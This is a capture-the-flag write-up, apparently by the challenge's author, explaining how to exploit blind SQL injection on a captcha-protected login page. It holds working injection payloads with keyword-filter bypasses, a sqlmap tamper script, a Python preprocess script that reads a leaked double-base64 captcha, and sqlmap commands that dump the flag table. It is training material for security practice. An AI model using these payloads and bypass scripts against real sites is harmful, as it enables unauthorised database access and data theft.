Exploit SQL Injection and bypass captcha with SQLMAP
Kenzy challenge (Cyber wargames 2022)
SQL Injection + Captcha bypass
Challenge description:
This login page is protected by captcha to deny any brute force attack.
1. The captcha is not fully secure
2. Login page functionality is vulnerable to Blind SQL Injection
Attack vector
Bypassing captcha and getting the flag from database.
Steps to solve this challenge
- Detect SQL Injection
If you enter invalid username or password it will show this response message
{"Username":"admin","status":"Invalid username or password"}
If you enter a single ‘ qoute it will show [statement error]
{"Username":"admin'","status":"statement error"}
Tried to enter 2 single qoutes ‘ ‘ it showed
{"Username":"admin","status":"Invalid username or password"}Its good, it may be vulnerable to Blind SQL Injection
After I passed this payload
admin'or sleep(5) --I found this reposne
admin'sleep(5)--
I found filters that remove [or , and , spaces]
I bypassed these filters by
1. spaces by => MySQL comment /**/
2. or => oorr
3. and => anandd
I sent this payload
admin'oorr/**/sleep(5)#Response was delayed to double of 5 secounds => 10 and redirect to admin panel => http://34.175.249.72:60001/kenzy_admin-panel.php
Treasures are always in the database
This means, I should make a full exploitation and dumb the database to get these Treasures :D
I want to run sqlmap but this will be stopped because we have a captcha
2. secound part => Captcha bypass
Inspect element to view src code, and I found the path of captcha.
Go to the path of captcha.php [http://34.175.249.72:60001/scripts/captcha.php] and view response by burpsuite, you will find captcha disclosure but its double encoded in base64
Notic:
You have 2 solutions
1. Write script to get this captcha code which disclosure
2. Write OCR python script to get captcha code from image
Scripting part
I chose to solve the challenge using SQLMap and tamper script to bypass filters and captcha using preprocess
Tamper script to bypass filters
from lib.core.enums import PRIORITY
import re
__priority__ = PRIORITY.LOWESTdef dependencies():
passdef tamper(payload, **kwargs):
retVal = payload
if payload:
retVal = re.sub(r"(?i)(or)", 'oorr', retVal)
retVal = re.sub(r"(?i)(and)", 'anandd', retVal)return retVal
preprocess script to bypass captcha
import requests,re,base64
import urllib.parsedef solve_captcha():
try:
cookies = {'PHPSESSID': 'dvtd7c1gss3oldmp4obam7hu6p'}
response = requests.get("http://34.175.249.72:60001/scripts/captcha.php",cookies=cookies ,verify=False)
except Exception as e:
print(e)fetch_captcha = re.findall(r"CAPTCHA.*", response.text)[0][10:-1]
return fetch_captchadef preprocess(req):
captcha = solve_captcha()
captcha = base64.b64decode(base64.b64decode(captcha).decode('utf-8')).decode('utf-8')if req.data:
req.data += b'&captcha='+captcha.encode("utf-8")
SQLMap command
python3 /usr/bin/sqlmap -r req-sqli.txt --banner --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py -p username --preprocess solve-captcha-preprocess.py --technique=B --not-string="statement error" --level=2Explain the command
--banner : Retrieve DBMS banner
--prefix : Injection payload starting
--suffix : Injection payload ending
--batch : Never ask for user input, use the default behavior
--tamper : Use given script(s) for tampering injection data
--preprocess: Use given script(s) for preprocessing (request)
--technique: SQL injection techniques to use
--not-string: String to match when query is evaluated to False
--level: Level of tests to perform (1-5)
-p : Testable parametertamper VS preprocess
tamper script: manuplate in sqlmap queries
preprocess script: manuplate other request parameters away from SQLMap queries and sent before every sqlmap query
Runing these scripts with in SQLMap to automate solving the captcha and dumb the database
python3 /usr/bin/sqlmap -r req-sqli.txt -dbms MySQL -D kenzy -T solve -C flag --dump --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py --proxy="http://127.0.0.1:8080" -p username --preprocess solve-captcha-preprocess.py --flush-session --technique=B --not-string="statement error" --level=2
Thank you this was SQL Injection challenge I developped for Arab secuirty cyber war games CTF.
